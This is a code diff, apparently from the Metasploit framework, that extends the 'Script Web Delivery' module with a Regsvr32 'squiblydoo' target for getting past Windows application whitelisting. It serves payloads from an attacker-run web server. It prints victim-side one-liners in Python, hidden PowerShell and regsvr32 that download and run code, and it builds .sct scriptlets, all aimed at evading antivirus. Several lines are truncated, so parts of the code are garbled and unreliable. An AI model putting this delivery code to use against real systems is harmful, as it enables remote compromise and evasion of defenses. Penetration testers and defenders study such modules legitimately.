@@ -15,22 +15,31 @@ def initialize(info = {})
1515 super ( update_info ( info ,
1616 'Name' => 'Script Web Delivery' ,
1717 'Description' => %q(
18- This module quickly fires up a web server that serves a payload.
19- The provided command will start the specified scripting language interpreter and then download and execute the
20- payload. The main purpose of this module is to quickly establish a session on a target
21- machine when the attacker has to manually type in the command himself, e.g. Command Injection,
22- RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not
23- write to disk so it is less likely to trigger AV solutions and will allow privilege
24- escalations supplied by Meterpreter. When using either of the PSH targets, ensure the
25- payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute
26- x86 payloads on x64 machines.
18+ This module quickly fires up a web server that serves a payload.
19+ The provided command which will allow for a payload to download and execute.
20+ It will do it either specified scripting language interpreter or "squiblydoo" via regsvr32.exe
21+ for bypassing application whitelisting. The main purpose of this module is to quickly establish
22+ a session on a target machine when the attacker has to manually type in the command:
23+ e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution.
24+ This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege
25+ escalations supplied by Meterpreter.
26+
27+ When using either of the PSH targets, ensure the payload architecture matches the target computer
28+ or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.
29+
30+ Regsvr32 uses "squiblydoo" technique for bypassing application whitelisting.
31+ The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included
32+ PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute)
33+ can occur on the same port.
2734 ) ,
2835 'License' => MSF_LICENSE ,
2936 'Author' =>
3037 [
3138 'Andrew Smith "jakx" <[email protected] >' , 3239 'Ben Campbell' ,
33- 'Chris Campbell' # @obscuresec - Inspiration n.b. no relation!
40+ 'Chris Campbell' , # @obscuresec - Inspiration n.b. no relation!
41+ 'Casey Smith' , # AppLocker bypass research and vulnerability discovery (@subTee)
42+ 'Trenton Ivey' , # AppLocker MSF Module (kn0)
3443 ] ,
3544 'DefaultOptions' =>
3645 {
@@ -41,7 +50,8 @@ def initialize(info = {})
4150 [ 'URL' , 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html' ] ,
4251 [ 'URL' , 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ] ,
4352 [ 'URL' , 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/' ] ,
44- [ 'URL' , 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html' ]
53+ [ 'URL' , 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html' ] ,
54+ [ 'URL' , 'http://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html' ] ,
4555 ] ,
4656 'Platform' => %w( python php win ) ,
4757 'Targets' =>
@@ -57,6 +67,10 @@ def initialize(info = {})
5767 [ 'PSH' , {
5868 'Platform' => 'win' ,
5969 'Arch' => [ ARCH_X86 , ARCH_X64 ]
70+ } ] ,
71+ [ 'Regsvr32' , {
72+ 'Platform' => 'win' ,
73+ 'Arch' => [ ARCH_X86 , ARCH_X64 ]
6074 } ]
6175 ] ,
6276 'DefaultTarget' => 0 ,
@@ -71,15 +85,21 @@ def initialize(info = {})
7185 end
7286
7387 def on_request_uri ( cli , _request )
74- print_status ( 'Delivering Payload' )
75- if target . name . include? 'PSH'
88+ if _request . raw_uri =~ /\. sct$/
89+ print_status ( "Handling .sct Request" )
90+ psh = gen_psh ( get_uri )
91+ data = gen_sct_file ( psh )
92+ send_response ( cli , data , 'Content-Type' => 'text/plain' )
93+ elsif target . name . include? 'PSH' or target . name . include? 'Regsvr32'
94+ print_status ( "Delivering Payload" )
7695 data = cmd_psh_payload ( payload . encoded ,
7796 payload_instance . arch . first ,
7897 remove_comspec : true ,
7998 exec_in_place : true
8099 )
81100 else
82- data = %Q(#{ payload . encoded }
101+ print_status ( "Delivering Payload" )
102+ data = %Q(#{ payload . encoded }
83103 end
84104 send_response ( cli , data , 'Content-Type' => 'application/octet-stream' )
85105 end
@@ -94,14 +114,33 @@ def primer
94114 print_line ( 'Python:' )
95115 print_line ( "python -c \" import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{ url } \" " )
96116 when 'PSH'
117+ print_line gen_psh ( url )
118+ when 'Regsvr32'
119+ print_line ( "regsvr32 /s /n /u /i:#{ url } )
120+ end
121+ end
122+
123+
124+ def gen_psh ( url )
97125 ignore_cert = Rex ::Powershell ::PshMethods . ignore_ssl_certificate if ssl
98126 download_string = datastore [ 'PSH-Proxy' ] ? ( Rex ::Powershell ::PshMethods . proxy_aware_download_and_exec_string ( url ) ) : ( Rex ::Powershell ::PshMethods . download_and_exec_string ( url ) )
99127 download_and_run = "#{ ignore_cert } #{ download_string }
100128 print_line generate_psh_command_line (
129+ return generate_psh_command_line (
101130 noprofile : true ,
102131 windowstyle : 'hidden' ,
103132 command : download_and_run
104133 )
105134 end
106135 end
107- end
136+
137+
138+ def rand_class_id
139+ "#{ Rex ::Text . rand_text_hex 8 } #{ Rex ::Text . rand_text_hex 4 } #{ Rex ::Text . rand_text_hex 4 } #{ Rex ::Text . rand_text_hex 4 } #{ Rex ::Text . rand_text_hex 12 }
140+ end
141+
142+
143+ def gen_sct_file ( command )
144+ %{<?XML version="1.0"?><scriptlet><registration progid="#{ rand_text_alphanumeric 8 } #{ rand_class_id } #{ command }
145+ end
146+ end
0 commit comments